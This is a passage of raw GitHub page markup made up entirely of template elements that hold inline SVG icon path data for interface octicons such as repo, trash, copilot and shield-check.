data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg></template> <template id="file-code-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file-code"> <path d="M4 1.75C4 .784 4.784 0 5.75 0h5.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v8.586A1.75 1.75 0 0 1 14.25 15h-9a.75.75 0 0 1 0-1.5h9a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 10 4.25V1.5H5.75a.25.25 0 0 0-.25.25v2.5a.75.75 0 0 1-1.5 0Zm1.72 4.97a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734l1.47-1.47-1.47-1.47a.75.75 0 0 1 0-1.06ZM3.28 7.78 1.81 9.25l1.47 1.47a.751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018l-2-2a.75.75 0 0 1 0-1.06l2-2a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Zm8.22-6.218V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg></template> <template id="history-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg></template> <template id="repo-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg></template> <template id="bookmark-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bookmark"> <path d="M3 2.75C3 1.784 3.784 1 4.75 1h6.5c.966 0 1.75.784 1.75 1.75v11.5a.75.75 0 0 1-1.227.579L8 11.722l-3.773 3.107A.751.751 0 0 1 3 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v9.91l3.023-2.489a.75.75 0 0 1 .954 0l3.023 2.49V2.75a.25.25 0 0 0-.25-.25Z"></path></svg></template> <template id="plus-circle-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-plus-circle"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm7.25-3.25v2.5h2.5a.75.75 0 0 1 0 1.5h-2.5v2.5a.75.75 0 0 1-1.5 0v-2.5h-2.5a.75.75 0 0 1 0-1.5h2.5v-2.5a.75.75 0 0 1 1.5 0Z"></path></svg></template> <template id="circle-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-dot-fill"> <path d="M8 4a4 4 0 1 1 0 8 4 4 0 0 1 0-8Z"></path></svg></template> <template id="trash-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path d="M11 1.75V3h2.25a.75.75 0 0 1 0 1.5H2.75a.75.75 0 0 1 0-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75ZM4.496 6.675l.66 6.6a.25.25 0 0 0 .249.225h5.19a.25.25 0 0 0 .249-.225l.66-6.6a.75.75 0 0 1 1.492.149l-.66 6.6A1.748 1.748 0 0 1 10.595 15h-5.19a1.75 1.75 0 0 1-1.741-1.575l-.66-6.6a.75.75 0 1 1 1.492-.15ZM6.5 1.75V3h3V1.75a.25.25 0 0 0-.25-.25h-2.5a.25.25 0 0 0-.25.25Z"></path></svg></template> <template id="team-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-people"> <path d="M2 5.5a3.5 3.5 0 1 1 5.898 2.549 5.508 5.508 0 0 1 3.034 4.084.75.75 0 1 1-1.482.235 4 4 0 0 0-7.9 0 .75.75 0 0 1-1.482-.236A5.507 5.507 0 0 1 3.102 8.05 3.493 3.493 0 0 1 2 5.5ZM11 4a3.001 3.001 0 0 1 2.22 5.018 5.01 5.01 0 0 1 2.56 3.012.749.749 0 0 1-.885.954.752.752 0 0 1-.549-.514 3.507 3.507 0 0 0-2.522-2.372.75.75 0 0 1-.574-.73v-.352a.75.75 0 0 1 .416-.672A1.5 1.5 0 0 0 11 5.5.75.75 0 0 1 11 4Zm-5.5-.5a2 2 0 1 0-.001 3.999A2 2 0 0 0 5.5 3.5Z"></path></svg></template> <template id="project-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg></template> <template id="pencil-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path d="M11.013 1.427a1.75 1.75 0 0 1 2.474 0l1.086 1.086a1.75 1.75 0 0 1 0 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 0 1-.927-.928l.929-3.25c.081-.286.235-.547.445-.758l8.61-8.61Zm.176 4.823L9.75 4.81l-6.286 6.287a.253.253 0 0 0-.064.108l-.558 1.953 1.953-.558a.253.253 0 0 0 .108-.064Zm1.238-3.763a.25.25 0 0 0-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 0 0 0-.354Z"></path></svg></template> <template id="copilot-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copilot"> <path d="M7.998 15.035c-4.562 0-7.873-2.914-7.998-3.749V9.338c.085-.628.677-1.686 1.588-2.065.013-.07.024-.143.036-.218.029-.183.06-.384.126-.612-.201-.508-.254-1.084-.254-1.656 0-.87.128-1.769.693-2.484.579-.733 1.494-1.124 2.724-1.261 1.206-.134 2.262.034 2.944.765.05.053.096.108.139.165.044-.057.094-.112.143-.165.682-.731 1.738-.899 2.944-.765 1.23.137 2.145.528 2.724 1.261.566.715.693 1.614.693 2.484 0 .572-.053 1.148-.254 1.656.066.228.098.429.126.612.012.076.024.148.037.218.924.385 1.522 1.471 1.591 2.095v1.872c0 .766-3.351 3.795-8.002 3.795Zm0-1.485c2.28 0 4.584-1.11 5.002-1.433V7.862l-.023-.116c-.49.21-1.075.291-1.727.291-1.146 0-2.059-.327-2.71-.991A3.222 3.222 0 0 1 8 6.303a3.24 3.24 0 0 1-.544.743c-.65.664-1.563.991-2.71.991-.652 0-1.236-.081-1.727-.291l-.023.116v4.255c.419.323 2.722 1.433 5.002 1.433ZM6.762 2.83c-.193-.206-.637-.413-1.682-.297-1.019.113-1.479.404-1.713.7-.247.312-.369.789-.369 1.554 0 .793.129 1.171.308 1.371.162.181.519.379 1.442.379.853 0 1.339-.235 1.638-.54.315-.322.527-.827.617-1.553.117-.935-.037-1.395-.241-1.614Zm4.155-.297c-1.044-.116-1.488.091-1.681.297-.204.219-.359.679-.242 1.614.091.726.303 1.231.618 1.553.299.305.784.54 1.638.54.922 0 1.28-.198 1.442-.379.179-.2.308-.578.308-1.371 0-.765-.123-1.242-.37-1.554-.233-.296-.693-.587-1.713-.7Z"></path><path d="M6.25 9.037a.75.75 0 0 1 .75.75v1.501a.75.75 0 0 1-1.5 0V9.787a.75.75 0 0 1 .75-.75Zm4.25.75v1.501a.75.75 0 0 1-1.5 0V9.787a.75.75 0 0 1 1.5 0Z"></path></svg></template> <template id="workflow-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-workflow"> <path d="M0 1.75C0 .784.784 0 1.75 0h3.5C6.216 0 7 .784 7 1.75v3.5A1.75 1.75 0 0 1 5.25 7H4v4a1 1 0 0 0 1 1h4v-1.25C9 9.784 9.784 9 10.75 9h3.5c.966 0 1.75.784 1.75 1.75v3.5A1.75 1.75 0 0 1 14.25 16h-3.5A1.75 1.75 0 0 1 9 14.25v-.75H5A2.5 2.5 0 0 1 2.5 11V7h-.75A1.75 1.75 0 0 1 0 5.25Zm1.75-.25a.25.25 0 0 0-.25.25v3.5c0 .138.112.25.25.25h3.5a.25.25 0 0 0 .25-.25v-3.5a.25.25 0 0 0-.25-.25Zm9 9a.25.25 0 0 0-.25.25v3.5c0 .138.112.25.25.25h3.5a.25.25 0 0 0 .25-.25v-3.5a.25.25 0 0 0-.25-.25Z"></path></svg></template> <template id="book-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path></svg></template> <template id="code-review-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code-review"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v8.5A1.75 1.75 0 0 1 14.25 13H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 14.543V13H1.75A1.75 1.75 0 0 1 0 11.25v-8.5C0 1.784.784 1 1.75 1ZM1.5 2.75v8.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-8.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Zm5.28 1.72a.75.75 0 0 1 0 1.06L5.31 7l1.47 1.47a.751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018l-2-2a.75.75 0 0 1 0-1.06l2-2a.75.75 0 0 1 1.06 0Zm2.44 0a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L10.69 7 9.22 5.53a.75.75 0 0 1 0-1.06Z"></path></svg></template> <template id="codespaces-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-codespaces"> <path d="M0 11.25c0-.966.784-1.75 1.75-1.75h12.5c.966 0 1.75.784 1.75 1.75v3A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25Zm2-9.5C2 .784 2.784 0 3.75 0h8.5C13.216 0 14 .784 14 1.75v5a1.75 1.75 0 0 1-1.75 1.75h-8.5A1.75 1.75 0 0 1 2 6.75Zm1.75-.25a.25.25 0 0 0-.25.25v5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-5a.25.25 0 0 0-.25-.25Zm-2 9.5a.25.25 0 0 0-.25.25v3c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-3a.25.25 0 0 0-.25-.25Z"></path><path d="M7 12.75a.75.75 0 0 1 .75-.75h4.5a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg></template> <template id="comment-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment"> <path d="M1 2.75C1 1.784 1.784 1 2.75 1h10.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 13.25 12H9.06l-2.573 2.573A1.458 1.458 0 0 1 4 13.543V12H2.75A1.75 1.75 0 0 1 1 10.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h4.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg></template> <template id="comment-discussion-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment-discussion"> <path d="M1.75 1h8.5c.966 0 1.75.784 1.75 1.75v5.5A1.75 1.75 0 0 1 10.25 10H7.061l-2.574 2.573A1.458 1.458 0 0 1 2 11.543V10h-.25A1.75 1.75 0 0 1 0 8.25v-5.5C0 1.784.784 1 1.75 1ZM1.5 2.75v5.5c0 .138.112.25.25.25h1a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h3.5a.25.25 0 0 0 .25-.25v-5.5a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25Zm13 2a.25.25 0 0 0-.25-.25h-.5a.75.75 0 0 1 0-1.5h.5c.966 0 1.75.784 1.75 1.75v5.5A1.75 1.75 0 0 1 14.25 12H14v1.543a1.458 1.458 0 0 1-2.487 1.03L9.22 12.28a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215l2.22 2.22v-2.19a.75.75 0 0 1 .75-.75h1a.25.25 0 0 0 .25-.25Z"></path></svg></template> <template id="organization-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-organization"> <path d="M1.75 16A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0h8.5C11.216 0 12 .784 12 1.75v12.5c0 .085-.006.168-.018.25h2.268a.25.25 0 0 0 .25-.25V8.285a.25.25 0 0 0-.111-.208l-1.055-.703a.749.749 0 1 1 .832-1.248l1.055.703c.487.325.779.871.779 1.456v5.965A1.75 1.75 0 0 1 14.25 16h-3.5a.766.766 0 0 1-.197-.026c-.099.017-.2.026-.303.026h-3a.75.75 0 0 1-.75-.75V14h-1v1.25a.75.75 0 0 1-.75.75Zm-.25-1.75c0 .138.112.25.25.25H4v-1.25a.75.75 0 0 1 .75-.75h2.5a.75.75 0 0 1 .75.75v1.25h2.25a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25ZM3.75 6h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5ZM3 3.75A.75.75 0 0 1 3.75 3h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 3.75Zm4 3A.75.75 0 0 1 7.75 6h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 7 6.75ZM7.75 3h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5ZM3 9.75A.75.75 0 0 1 3.75 9h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 9.75ZM7.75 9h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5Z"></path></svg></template> <template id="rocket-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-rocket"> <path d="M14.064 0h.186C15.216 0 16 .784 16 1.75v.186a8.752 8.752 0 0 1-2.564 6.186l-.458.459c-.314.314-.641.616-.979.904v3.207c0 .608-.315 1.172-.833 1.49l-2.774 1.707a.749.749 0 0 1-1.11-.418l-.954-3.102a1.214 1.214 0 0 1-.145-.125L3.754 9.816a1.218 1.218 0 0 1-.124-.145L.528 8.717a.749.749 0 0 1-.418-1.11l1.71-2.774A1.748 1.748 0 0 1 3.31 4h3.204c.288-.338.59-.665.904-.979l.459-.458A8.749 8.749 0 0 1 14.064 0ZM8.938 3.623h-.002l-.458.458c-.76.76-1.437 1.598-2.02 2.5l-1.5 2.317 2.143 2.143 2.317-1.5c.902-.583 1.74-1.26 2.499-2.02l.459-.458a7.25 7.25 0 0 0 2.123-5.127V1.75a.25.25 0 0 0-.25-.25h-.186a7.249 7.249 0 0 0-5.125 2.123ZM3.56 14.56c-.732.732-2.334 1.045-3.005 1.148a.234.234 0 0 1-.201-.064.234.234 0 0 1-.064-.201c.103-.671.416-2.273 1.15-3.003a1.502 1.502 0 1 1 2.12 2.12Zm6.94-3.935c-.088.06-.177.118-.266.175l-2.35 1.521.548 1.783 1.949-1.2a.25.25 0 0 0 .119-.213ZM3.678 8.116 5.2 5.766c.058-.09.117-.178.176-.266H3.309a.25.25 0 0 0-.213.119l-1.2 1.95ZM12 5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg></template> <template id="shield-check-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield-check"> <path d="m8.533.133 5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667l5.25-1.68a1.748 1.748 0 0 1 1.066 0Zm-.61 1.429.001.001-5.25 1.68a.251.251 0 0 0-.174.237V7c0 1.36.275 2.666 1.057 3.859.784 1.194 2.121 2.342 4.366 3.298a.196.196 0 0 0 .154 0c2.245-.957 3.582-2.103 4.366-3.297C13.225 9.666 13.5 8.358 13.5 7V3.48a.25.25 0 0 0-.174-.238l-5.25-1.68a.25.25 0 0 0-.153 0ZM11.28 6.28l-3.5 3.5a.75.75 0 0 1-1.06 0l-1.5-1.5a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215l.97.97 2.97-2.97a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg></template> <template id="heart-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-heart"> <path d="m8 14.25.345.666a.75.75 0 0 1-.69 0l-.008-.004-.018-.01a7.152 7.152 0 0 1-.31-.17 22.055 22.055 0 0 1-3.434-2.414C2.045 10.731 0 8.35 0 5.5 0 2.836 2.086 1 4.25 1 5.797 1 7.153 1.802 8 3.02 8.847 1.802 10.203 1 11.75 1 13.914 1 16 2.836 16 5.5c0 2.85-2.045 5.231-3.885 6.818a22.066 22.066 0 0 1-3.744 2.584l-.018.01-.006.003h-.002ZM4.25 2.5c-1.336 0-2.75 1.164-2.75 3 0 2.15 1.58 4.144 3.365 5.682A20.58 20.58 0 0 0 8 13.393a20.58 20.58 0 0 0 3.135-2.211C12.92 9.644 14.5 7.65 14.5 5.5c0-1.836-1.414-3-2.75-3-1.373 0-2.609.986-3.029 2.456a.749.749 0 0 1-1.442 0C6.859 3.486 5.623 2.5 4.25 2.5Z"></path></svg></template> <template id="server-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-server"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v4c0 .372-.116.717-.314 1 .198.283.314.628.314 1v4a1.75 1.75 0 0 1-1.75 1.75H1.75A1.75 1.75 0 0 1 0 12.75v-4c0-.358.109-.707.314-1a1.739 1.739 0 0 1-.314-1v-4C0 1.784.784 1 1.75 1ZM1.5 2.75v4c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Zm.25 5.75a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25ZM7 4.75A.75.75 0 0 1 7.75 4h4.5a.75.75 0 0 1 0 1.5h-4.5A.75.75 0 0 1 7 4.75ZM7.75 10h4.5a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1 0-1.5ZM3 4.75A.75.75 0 0 1 3.75 4h.5a.75.75 0 0 1 0 1.5h-.5A.75.75 0 0 1 3 4.75ZM3.75 10h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1 0-1.5Z"></path></svg></template> <template id="globe-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-globe"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM5.78 8.75a9.64 9.64 0 0 0 1.363 4.177c.255.426.542.832.857 1.215.245-.296.551-.705.857-1.215A9.64 9.64 0 0 0 10.22 8.75Zm4.44-1.5a9.64 9.64 0 0 0-1.363-4.177c-.307-.51-.612-.919-.857-1.215a9.927 9.927 0 0 0-.857 1.215A9.64 9.64 0 0 0 5.78 7.25Zm-5.944 1.5H1.543a6.507 6.507 0 0 0 4.666 5.5c-.123-.181-.24-.365-.352-.552-.715-1.192-1.437-2.874-1.581-4.948Zm-2.733-1.5h2.733c.144-2.074.866-3.756 1.58-4.948.12-.197.237-.381.353-.552a6.507 6.507 0 0 0-4.666 5.5Zm10.181 1.5c-.144 2.074-.866 3.756-1.58 4.948-.12.197-.237.381-.353.552a6.507 6.507 0 0 0 4.666-5.5Zm2.733-1.5a6.507 6.507 0 0 0-4.666-5.5c.123.181.24.365.353.552.714 1.192 1.436 2.874 1.58 4.948Z"></path></svg></template> <template id="issue-opened-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg></template> <template id="device-mobile-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-mobile"> <path d="M3.75 0h8.5C13.216 0 14 .784 14 1.75v12.5A1.75 1.75 0 0 1 12.25 16h-8.5A1.75 1.75 0 0 1 2 14.25V1.75C2 .784 2.784 0 3.75 0ZM3.5 1.75v12.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25ZM8 13a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg></template> <template id="package-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-package"> <path d="m8.878.392 5.25 3.045c.54.314.872.89.872 1.514v6.098a1.75 1.75 0 0 1-.872 1.514l-5.25 3.045a1.75 1.75 0 0 1-1.756 0l-5.25-3.045A1.75 1.75 0 0 1 1 11.049V4.951c0-.624.332-1.201.872-1.514L7.122.392a1.75 1.75 0 0 1 1.756 0ZM7.875 1.69l-4.63 2.685L8 7.133l4.755-2.758-4.63-2.685a.248.248 0 0 0-.25 0ZM2.5 5.677v5.372c0 .09.047.171.125.216l4.625 2.683V8.432Zm6.25 8.271 4.625-2.683a.25.25 0 0 0 .125-.216V5.677L8.75 8.432Z"></path></svg></template> <template id="credit-card-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-credit-card"> <path d="M10.75 9a.75.75 0 0 0 0 1.5h1.5a.75.75 0 0 0 0-1.5h-1.5Z"></path><path d="M0 3.75C0 2.784.784 2 1.75 2h12.5c.966 0 1.75.784 1.75 1.75v8.5A1.75 1.75 0 0 1 14.25 14H1.75A1.75 1.75 0 0 1 0 12.25ZM14.5 6.5h-13v5.75c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25Zm0-2.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25V5h13Z"></path></svg></template> <template id="play-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg></template> <template id="gift-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-gift"> <path d="M2 2.75A2.75 2.75 0 0 1 4.75 0c.983 0 1.873.42 2.57 1.232.268.318.497.668.68 1.042.183-.375.411-.725.68-1.044C9.376.42 10.266 0 11.25 0a2.75 2.75 0 0 1 2.45 4h.55c.966 0 1.75.784 1.75 1.75v2c0 .698-.409 1.301-1 1.582v4.918A1.75 1.75 0 0 1 13.25 16H2.75A1.75 1.75 0 0 1 1 14.25V9.332C.409 9.05 0 8.448 0 7.75v-2C0 4.784.784 4 1.75 4h.55c-.192-.375-.3-.8-.3-1.25ZM7.25 9.5H2.5v4.75c0 .138.112.25.25.25h4.5Zm1.5 0v5h4.5a.25.25 0 0 0 .25-.25V9.5Zm0-4V8h5.5a.25.25 0 0 0 .25-.25v-2a.25.25 0 0 0-.25-.25Zm-7 0a.25.25 0 0 0-.25.25v2c0 .138.112.25.25.25h5.5V5.5h-5.5Zm3-4a1.25 1.25 0 0 0 0 2.5h2.309c-.233-.818-.542-1.401-.878-1.793-.43-.502-.915-.707-1.431-.707ZM8.941 4h2.309a1.25 1.25 0 0 0 0-2.5c-.516 0-1 .205-1.43.707-.337.392-.646.975-.879 1.793Z"></path></svg></template> <template id="code-square-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code-square"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25Zm7.47 3.97a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L10.69 8 9.22 6.53a.75.75 0 0 1 0-1.06ZM6.78 6.53 5.31 8l1.47 1.47a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215l-2-2a.75.75 0 0 1 0-1.06l2-2a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg></template> <template id="device-desktop-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path d="M14.25 1c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 14.25 12h-3.727c.099 1.041.52 1.872 1.292 2.757A.752.752 0 0 1 11.25 16h-6.5a.75.75 0 0 1-.565-1.243c.772-.885 1.192-1.716 1.292-2.757H1.75A1.75 1.75 0 0 1 0 10.25v-7.5C0 1.784.784 1 1.75 1ZM1.75 2.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25ZM9.018 12H6.982a5.72 5.72 0 0 1-.765 2.5h3.566a5.72 